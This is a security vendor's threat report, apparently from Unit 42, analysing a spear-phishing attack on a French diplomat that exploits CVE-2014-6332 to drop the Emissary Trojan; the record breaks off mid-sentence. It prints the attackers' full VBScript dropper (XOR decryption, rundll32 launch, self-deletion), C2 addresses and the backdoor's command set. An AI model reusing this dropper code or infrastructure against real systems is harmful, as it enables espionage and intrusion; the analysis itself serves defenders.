{ "id": "27b2c64a-bc29-4a23-bd1b-1ceb87a35605", "created_at": "2026-04-06T00:15:51.943786Z", "updated_at": "2026-04-10T03:34:27.57544Z", "deleted_at": null, "sha1_hash": "8c24226faacc952e606ef9d3fdda0216f13b9f5b", "title": "Attack on French Diplomat Linked to Operation Lotus Blossom", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 509896, "plain_text": "Attack on French Diplomat Linked to Operation Lotus Blossom\r\nBy Robert Falcone, Jen Miller-Osborn\r\nPublished: 2015-12-18 · Archived: 2026-04-05 15:05:16 UTC\r\nWe observed a targeted attack in November directed at an individual working for the French Ministry of Foreign\r\nAffairs. The attack involved a spear-phishing email sent to a single French diplomat based in Taipei, Taiwan and\r\ncontained an invitation to a Science and Technology support group event.\r\nThe actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept (POC)\r\ncode to install a Trojan called Emissary, which is related to the Operation Lotus Blossom campaign. The TTPs\r\nused in this attack also match those detailed in the paper. The targeting of this individual suggests the actors are\r\ninterested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between\r\nFrance and Taiwan.\r\nWe have created the Emissary tag for AutoFocus users to track this threat.\r\nEn garde!\r\nOn November 10, 2015, threat actors sent a spear-phishing email to an individual at the French Ministry of\r\nForeign Affairs. The subject and the body of the email suggest the targeted individual had been invited to a\r\nScience and Technology conference in Hsinchu, Taiwan. The e-mail appears quite timely, as the conference was\r\nheld on November 13, 2015, which is three days after the attack took place.\r\nThe email body contained a link to the legitimate registration page for the conference, but the email also had two\r\nattachments with the following filenames that also pertain to the conference:\r\n1. 蔡英文柯建銘全國科技後援會邀請函.doc (translates to “Tsai Ker Chien-ming National Science and\r\nTechnology Support Association invitations.doc”)\r\n2. 書面報名表格.doc (translates to “Written Application Form.doc”)\r\nBoth attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array\r\nRemote Code Execution Vulnerability tracked by CVE-2014-6332. Upon successful exploitation, the attachments\r\nwill install a Trojan named Emissary and open a Word document as a decoy.\r\nThe first attachment opens a decoy (Figure 2) that is a copy of an invitation to a Science and Technology\r\nconference this past November 13th held in Hsingchu, Taiwan, while the second opens a decoy (Figure 1) that is a\r\nregistration form to attend the conference. The conference was widely advertised online and on Facebook,\r\nhowever in this case the invitation includes a detailed itinerary that does not seem to have appeared online. The\r\nDemocratic Progressive’s Party (DPP) Chairwoman Tsai Ing-wen and DPP caucus whip and Hsinchu\r\nrepresentative Ker Chien-ming were the primary political sponsors of the conference and are longtime political\r\nallies. Tsai Ing-wen is the current front-runner for the Taiwanese Presidency and Ker Chien-ming may become\r\nSpeaker if she wins. The conference focused on using open source technology, open international recruiting, and\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 1 of 16\n\npartnerships to continue developing Hsinchu as the Silicon Valley of Taiwan. It particularly noted France as an\r\nally in this, and France is Taiwan’s second largest technology partner and fourth largest trading partner in Europe.\r\nFigure 1 Decoy document containing written application form\r\nFigure 2 Decoy document containing the invitation and agenda for event\r\nExploiting CVE-2014-6332\r\nThe threat actors attempted to exploit CVE-2014-6332 using the POC code available in the wild. The POC code\r\ncontains inline comments that explain how the malicious VBScript exploits this vulnerability, so instead of\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 2 of 16\n\ndiscussing the malicious script or exploit itself, we will focus on the portions of the script that the threat actors\r\nmodified.\r\nThe actors removed the explanatory comments from the VBScript and made slight modifications to the POC code.\r\nThe only major functional difference between the POC and the VBScript involved adding the ability to extract and\r\nrun both a decoy document and payload. Figure 3 and 4 compare the differing “runshell” command within the\r\nPOC and the malicious documents used in this attack. The code in Figure 3 shows that the POC does nothing\r\nmore than launch the notepad.exe application upon successful exploitation. Figure 4 shows the malicious\r\ndocument creating a file named “ss.vbs” that it writes a VBScript to using a series of “echo” statements. After\r\nwriting the VBScript, the malicious document executes the “ss.vbs” file.\r\nfunction runshell()\r\n  On Error Resume Next\r\n  set shell=createobject(\"Shell.Application\")\r\n  shell.ShellExecute \"notepad.exe\"\r\nend function\r\nFigure 3 Code block containing “runshell” function in CVE-2014-6332 proof-of-concept VBScript\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\nfunction runshell()\r\n  On Error Resume Next\r\n  set objshell= Createobject(\"WScript.Shell\")\r\n  strValue = objshell.RegRead(\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell\r\nFolders\\Local AppData\")\r\n  ename = \"rundll32\"\",\"\"\"\"\"\"\"\u0026strValue\u0026\"\\mm.dll\"\"\"\",Setting\"\r\n  outfile1= strValue\u0026\"\\mm.dll\"\r\n  bs = strValue\u0026\"\\ss.vbs\"\r\n  dn= strValue\u0026\"\\t.doc\"\r\n  v=window.location.href\r\n  v=Replace(v,\"file:///\",\"\",1,1,1)\r\n  v=Replace(v,\"?.html\",\"\",1,1,1)\r\n  v=Replace(v,\"%20\",\" \",1)\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 3 of 16\n\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n  v=Replace(v,\"/\",\"\\\",1)            \r\n  cmd = \"cmd\"\r\n  arg=\" /c taskkill  -f -im winword.exe \"\r\n  arg1= \"\"\",\"\"\"\r\n  set shell=createobject(\"wscript.shell\")\r\n  shell.run \"cmd.exe /c \"\"echo On Error Resume Next \u003e\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true  \r\n  shell.run \"cmd.exe /c \"\"echo set shell=createobject(\"\"Shell.Application\"\") \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"    \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo shell.ShellExecute \"\"cmd\"\",\"\"\"\u0026arg\u0026\"\"\",\"\"\"\",\"\"\"\",0\r\n\u003e\u003e\"\"\"\u0026bs\u0026\"\"\"        \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo wscript.sleep 3000             \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo dim str                                                                      \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo dim L1                                                                       \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo dim L2                                                                       \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo dim Len                                                                      \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo dim infile                                                                   \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo dim outfile1                                                                 \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo dim outfile2                                                                 \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo infile = \"\"\"\u0026v\u0026\"\"\"                                                             \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo outfile1 = \"\"\"\u0026outfile1\u0026\"\"\"                                                           \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo outfile2 = \"\"\"\u0026dn\u0026\"\"\"                                                           \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 4 of 16\n\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n  shell.run \"cmd.exe /c \"\"echo L1=     78924                                                                      \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo L2=     38912                                                                   \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo size=    144893                                                                 \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo offset1 = size-L1-L2                                                         \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo offset2 = size-L2                                                            \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo Len=0                                                                        \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo str = ReadBinary (infile,L1,offset1)                                         \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo WriteBinary outfile1, str                                                    \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo str = ReadBinary (infile,L2,offset2)                                         \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo WriteBinary outfile2, str                                                    \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo Function ReadBinary(FileName,length,offset)                                  \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   Dim Buf(), I                                                               \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   With CreateObject(\"\"ADODB.Stream\"\")                                        \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     .Mode = 3: .Type = 1: .Open: .LoadFromFile FileName : .Position =\r\noffset \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     Len =length -1                                                           \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     ReDim Buf(Len)                                                           \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 5 of 16\n\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\n71\r\n72\r\n73\r\n74\r\n75\r\n76\r\n77\r\n78\r\n79\r\n80\r\n  shell.run \"cmd.exe /c \"\"echo     For I = 0 To Len: if(I=0)  then Buf(I)=(AscB(.Read(1))) else if ((I mod\r\n2)=0) then Buf(I)=(AscB(.Read(1)) xor AscB(chr(65))) else Buf(I)=(AscB(.Read(1)) xor\r\nAscB(chr(67))) end if        \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     Next                      \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     .Close                                                                   \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   End With                                                                   \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   ReadBinary = Buf                                                           \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo End Function                                                                 \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo Sub WriteBinary(FileName, Buf)                                               \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   Dim I, aBuf, Size, bStream                                                 \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   Size = UBound(Buf): ReDim aBuf(Size \\ 2)                                   \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   For I = 0 To Size - 1 Step 2                                               \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo       aBuf(I \\ 2) = ChrW(Buf(I + 1) * 256 + Buf(I))                          \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   Next                                                                       \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   If I = Size Then aBuf(I \\ 2) = ChrW(Buf(I))                                \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   aBuf=Join(aBuf, \"\"\"\")                                                      \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   Set bStream = CreateObject(\"\"ADODB.Stream\"\")                               \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   bStream.Type = 1: bStream.Open                                             \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 6 of 16\n\nshell.run \"cmd.exe /c \"\"echo   With CreateObject(\"\"ADODB.Stream\"\")                                        \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     .Type = 2 : .Open: .WriteText aBuf                                       \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo     .Position = 2: .CopyTo bStream: .Close                                   \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   End With                                                                   \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   bStream.SaveToFile FileName, 2: bStream.Close                              \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo   Set bStream = Nothing                                                      \u003e\u003e\r\n\"\"\"\u0026bs\u0026\"\"\"  \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo End Sub                                                                      \u003e\u003e \"\"\"\u0026bs\u0026\"\"\"  \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo set shell=createobject(\"\"Shell.Application\"\") \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"    \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo shell.ShellExecute \"\"\"\u0026dn\u0026\"\"\" \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"               \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo shell.ShellExecute \"\"\"\u0026ename\u0026\"\"\" \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"               \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo Set xa = CreateObject(\"\"Scripting.FileSystemObject\"\")\r\n\u003e\u003e\"\"\"\u0026bs\u0026\"\"\"                      \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo If xa.FileExists(\"\"\"\u0026bs\u0026\"\"\") Then                    \r\n\u003e\u003e\"\"\"\u0026bs\u0026\"\"\"                      \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo Set xb = xa.GetFile(\"\"\"\u0026bs\u0026\"\"\")                      \r\n\u003e\u003e\"\"\"\u0026bs\u0026\"\"\"                      \"\" \",0,true\r\n  shell.run \"cmd.exe /c \"\"echo xb.Delete                                             \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"                      \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"echo End If                                                \u003e\u003e\"\"\"\u0026bs\u0026\"\"\"                      \"\"\r\n\",0,true\r\n  shell.run \"cmd.exe /c \"\"\"\u0026bs\u0026\"\"\"   \",0,true\r\nend function\r\nFigure 4 Code block containing \"runshell\" function in malicious VBScript within attachment\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 7 of 16\n\nThe ss.vbs file is responsible for locating the payload and decoy document from the initial malicious document, as\r\nwell as decrypting, saving and opening both of the files. The script has hardcoded offsets to the location of both\r\nthe payload and decoy document within the initial document. The script will decrypt both of the embedded files\r\nusing a two-byte XOR loop that skips the first byte and then decrypts the remaining using “A” and “C” as the key.\r\nAfter decrypting the embedded files, the script saves the decoy to “t.doc” and the payload to “mm.dll” in the\r\n“%APPDATA%\\LocalData” folder. Finally, the script will open the decoy document and launch the payload by\r\ncalling its exported function named “Setting”.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\nOn Error Resume Next    \r\nset shell=createobject(\"Shell.Application\")      \r\nshell.ShellExecute \"cmd\",\" /c taskkill  -f -im winword.exe \",\"\",\"\",0          \r\nwscript.sleep 3000                \r\ndim str                                                                        \r\ndim L1                                                                          \r\ndim L2                                                                          \r\ndim Len                                                                        \r\ndim infile                                                                      \r\ndim outfile1                                                                    \r\ndim outfile2                                                                    \r\ninfile = \"C:\\Documents and Settings\\\u003cusername\u003e\\Desktop\\\u003cmalicious document\r\nname\u003e.doc\"                                                              \r\noutfile1 = \"C:\\Documents and Settings\\\u003cusername\u003e\\Local Settings\\Application\r\nData\\mm.dll\"                                                              \r\noutfile2 = \"C:\\Documents and Settings\\\u003cusername\u003e\\Local Settings\\Application\r\nData\\t.doc\"                                                            \r\nL1=     78924                                                                        \r\nL2=     38912\r\nsize=    144893                                                                    \r\noffset1 = size-L1-L2                                                            \r\noffset2 = size-L2                                                              \r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 8 of 16\n\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\nLen=0                                                                          \r\nstr = ReadBinary (infile,L1,offset1)                                            \r\nWriteBinary outfile1, str                                                      \r\nstr = ReadBinary (infile,L2,offset2)                                            \r\nWriteBinary outfile2, str                                                      \r\nFunction ReadBinary(FileName,length,offset)                                    \r\n  Dim Buf(), I                                                                  \r\n  With CreateObject(\"ADODB.Stream\")                                          \r\n    .Mode = 3: .Type = 1: .Open: .LoadFromFile FileName : .Position = offset    \r\n    Len =length -1                                                            \r\n    ReDim Buf(Len)                                                              \r\n    For I = 0 To Len: if(I=0)  then Buf(I)=(AscB(.Read(1))) else if ((I mod 2)=0) then Buf(I)=\r\n(AscB(.Read(1)) xor AscB(chr(65))) else Buf(I)=(AscB(.Read(1)) xor AscB(chr(67))) end if          \r\n    Next                        \r\n    .Close                                                                      \r\n  End With                                                                      \r\n  ReadBinary = Buf                                                              \r\nEnd Function                                                                    \r\nSub WriteBinary(FileName, Buf)                                                  \r\n  Dim I, aBuf, Size, bStream                                                    \r\n  Size = UBound(Buf): ReDim aBuf(Size \\ 2)                                      \r\n  For I = 0 To Size - 1 Step 2                                                  \r\n      aBuf(I \\ 2) = ChrW(Buf(I + 1) * 256 + Buf(I))                            \r\n  Next                                                                          \r\n  If I = Size Then aBuf(I \\ 2) = ChrW(Buf(I))                                  \r\n  aBuf=Join(aBuf, \"\")                                                        \r\n  Set bStream = CreateObject(\"ADODB.Stream\")                                  \r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 9 of 16\n\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n  bStream.Type = 1: bStream.Open                                                \r\n  With CreateObject(\"ADODB.Stream\")                                          \r\n    .Type = 2 : .Open: .WriteText aBuf                                          \r\n    .Position = 2: .CopyTo bStream: .Close                                      \r\n  End With                                                                      \r\n  bStream.SaveToFile FileName, 2: bStream.Close                                \r\n  Set bStream = Nothing                                                        \r\nEnd Sub                                                                        \r\nset shell=createobject(\"Shell.Application\")      \r\nshell.ShellExecute \"C:\\Documents and Settings\\\u003cusername\u003e\\Local Settings\\Application\r\nData\\t.doc\"                \r\nshell.ShellExecute \"rundll32\",\"\"\"C:\\Documents and Settings\\\u003cusername\u003e\\Local Settings\\Application\r\nData\\mm.dll\"\",Setting\"                \r\nSet xa = CreateObject(\"Scripting.FileSystemObject\")                        \r\nIf xa.FileExists(\"C:\\Documents and Settings\\\u003cusername\u003e\\Local Settings\\Application Data\\ss.vbs\")\r\nThen                                            \r\nSet xb = xa.GetFile(\"C:\\Documents and Settings\\\u003cusername\u003e\\Local Settings\\Application\r\nData\\ss.vbs\")                                              \r\nxb.Delete                                                                    \r\nEnd If\r\nFigure 5 VBScript within ss.vbs responsible for extracting and running the payload and decoy\r\nEmissary 5.3 Analysis\r\nThe payload of this attack is a Trojan that we track with the name Emissary. This Trojan is related to the Elise\r\nbackdoor described in the Operation Lotus Blossom report. Both Emissary and Elise are part of a malware group\r\nreferred to as “LStudio”, which is based on the following debug strings found in Emissary and Elise samples:\r\nd:\\lstudio\\projects\\worldclient\\emissary\\Release\\emissary\\i386\\emissary.pdb\r\nd:\\lstudio\\projects\\lotus\\elise\\Release\\EliseDLL\\i386\\EliseDLL.pdb\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 10 of 16\n\nThere is code overlap between Emissary and Elise, specifically in the use of a common function to log debug\r\nmessages to a file and a custom algorithm to decrypt the configuration file. The custom algorithm used by\r\nEmissary and Elise to decrypt their configurations use the “srand” function to set a seed value for the “rand”\r\nfunction, which the algorithm uses to generate a key. While the “rand” function is meant to generate random\r\nnumbers, the malware author uses the “srand” function to seed the “rand” function with a static value. The static\r\nseed value causes the “rand” function to create the same values each time it is called and results in a static key to\r\ndecrypt the configuration. The seed value is where the Emissary and Elise differ in their use of this algorithm, as\r\nEmissary uses a seed value of 1024 (as seen in Figure 6) and Elise uses the seed value of 2012.\r\nFigure 6 Custom algorithm in Emissary using 'srand' and 'rand' with 1024 as a seed value\r\nWhile these two Trojans share code, we consider Emissary and Elise separate tools since their configuration\r\nstructure, command handler and C2 communications channel differ. The Emissary Trojan delivered in this attack\r\ncontains the components listed in Table 1. At a high level, Emissary has an initial loader DLL that extracts a\r\nconfiguration file and a second DLL containing Emissary’s functional code that it injects into Internet Explorer.\r\nMD5 Path Description\r\n06f1d2be5e981dee056c231d184db908 %APPDATA%\\LocalData\\ishelp.dll Loader\r\n6278fc8c7bf14514353797b229d562e8 %APPDATA%\\LocalData\\A08E81B411.DAT Emissary Payload\r\ne9f51a4e835929e513c3f30299567abc %APPDATA%\\LocalData\\75BD50EC.DAT Configuration file\r\nvaries %TEMP%\\000A758C8FEAE5F.TMP Log file\r\nTable 1 Dropped files associated with Emissary Trojan seen in attack on French Ministry of Foreign Affairs\r\nThe loader Trojan named “ishelp.dll” had an original name of “Loader.dll”, which will extract the Emissary\r\npayload from a resource named \"asdasdasdasdsad\" and write it to a file named “A08E81B411.DAT”. The loader\r\nwill then write an embedded configuration to a file named “75BD50EC.DAT”. The loader Trojan creates a mutex\r\nnamed “_MICROSOFT_LOADER_MUTEX_” and finishes by injecting the Emissary DLL in\r\n“A08E81B411.DAT” into a newly spawned Internet Explorer process.\r\nThe Emissary Trojan runs within the Internet Explorer process. It begins by reading and decrypting its\r\nconfiguration file, which has the following structure:\r\nstruct emissary_config {\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 11 of 16\n\nWORD emissary_version_major;\r\nWORD emissary_version_minor;\r\nCHAR[36] GUID_for_sample;\r\nWORD Unknown1;\r\nCHAR[128] Server1;\r\nCHAR[128] Server2;\r\nCHAR[128] Server3;\r\nCHAR[128] CampaignName;\r\nCHAR[550] Unknown2;\r\nWORD Delay_interval_seconds;\r\n};\r\nWe decrypted and parsed the configuration file that accompanied the payload used in this attack, which resulted in\r\nthe following settings:\r\nVersion: 5.3\r\nGUID: ba87c1c5-f71c-4a8b-b511-07aa113d9103\r\nC2 Server 1: http://ustar5.PassAs[.]us/default.aspx\r\nC2 Server 2: http://203.124.14.229/default.aspx\r\nC2 Server 3: http://dnt5b.myfw[.]us/default.aspx\r\nCampaign Code: UPG-ZHG-01\r\nSleep Delay: 300\r\nAfter decrypting the configuration file, Emissary interacts with its command and control (C2) servers using HTTP\r\nor HTTPS, depending on the protocol specified in the configuration file. The initial network beacon sent from\r\nEmissary to its C2 server, seen in Figure 7, includes a Cookie field that contains a “GUID”, “op” and “SHO” field.\r\nThe GUID field is a unique identifier for the compromised system that is obtained directly from the configuration\r\nfile. The op field has a value of “101”, which is a static value that represents the initial network beacon. The SHO\r\nfield contains the external IP address of the infected system, which Emissary obtains from a legitimate website\r\n“showip.net”, specifically parsing the website’s response for ‘\u003cinput id=\"checkip\" type=\"text\" name=\"check_ip\"\r\nvalue=’, which contains the IP address of the system.\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 12 of 16\n\nFigure 7 Network beacon sent from Emissary Trojan to C2 server\r\nThe C2 server response to this beacon (seen in Figure 8) will contain a header field called “Set-Cookie”, which\r\ncontains a value of “SID”. The SID value is base64 encoded and encrypted using a rolling XOR algorithm, which\r\nonce decoded and decrypted contains a 36-character GUID value. The Emissary Trojan will use this GUID value\r\nprovided by the C2 server as an encryption key that it will use to encrypt data sent in subsequent network\r\ncommunications.\r\nFigure 8 C2 response to Emissary beacon\r\nThe C2 server provides commands to the Trojan as a three digit numeric string within the data portion of the\r\nHTTP response (in the form of “op=\u003ccommand\u003e”), which the Emissary Trojan will decrypt and compare to a list\r\nof commands within its command handler. The command handler function within the Emissary Trojan supports\r\nsix commands, as seen in Table 2.\r\nCommand Description\r\n102 Upload a file to the C2 server.\r\n103 Executes a specified command.\r\n104 Download file from the C2 server.\r\n105 Update configuration file.\r\n106 Create a remote shell.\r\n107 Updates the Trojan with a new executable.\r\nTable 2 Command handler within Emissary version 5.3\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 13 of 16\n\nIf the command issued from the C2 server does not match the one listed in the Trojan saves the message\r\n\"unkown:%s\" to the log file. The command set available within Emissary allows the threat actors backdoor access\r\nto a compromised system. Using this access, the threat actors can exfiltrate data and carry out further activities on\r\nthe system, including interacting directly with the system’s command shell and downloading and executing\r\nadditional tools for further functionality.\r\nThreat Infrastructure\r\nThe infrastructure associated with the Emissary C2 servers used in this attack includes ustar5.PassAs[.]us,\r\n203.124.14.229 and dnt5b.myfw[.]us. The infrastructure is rather isolated as the only overlap in domains includes\r\nappletree.onthenetas[.]com. The overlap, as seen in Figure 9 involves two IP addresses that during the same time\r\nframe resolved both the appletree.onthenetas[.]com domain and the Emissary C2 domain of ustar5.PassAs[.]us.\r\nThe other C2 domain used by this Emissary payload, specifically dnt5b.myfw[.]us currently resolves to the\r\n127.0.0.1. This provides another glimpse into TTPs for these threat actors, as it suggests that the threat actors set\r\nthe secondary C2 domains to resolve to the localhost IP address to avoid network detection and change this to a\r\nroutable IP address when they need the C2 server operational. Additionally, while this infrastructure does not\r\noverlap with that used in Operation Lotus Blossom, that also fits with the TTPs. In each case, the threat actors\r\nused separate infrastructure for different targets, another way to help avoid detection.\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 14 of 16\n\nFigure 9 Infrastructure associated with Emissary Trojan\r\nConclusion\r\nAPT threat actors, most likely nation state-sponsored, targeted a diplomat in the French Ministry of Foreign\r\nAffairs with a seemingly legitimate invitation to a technology conference in Taiwan. It is entirely possible the\r\ndiplomat was truly invited to the conference, or at least would not have been surprised by the invitation, adding to\r\nthe likelihood the attachment would have been opened. The actors were attempting to exploit CVE-2014-6332 to\r\ninstall a new version of the Emissary Trojan, specifically version 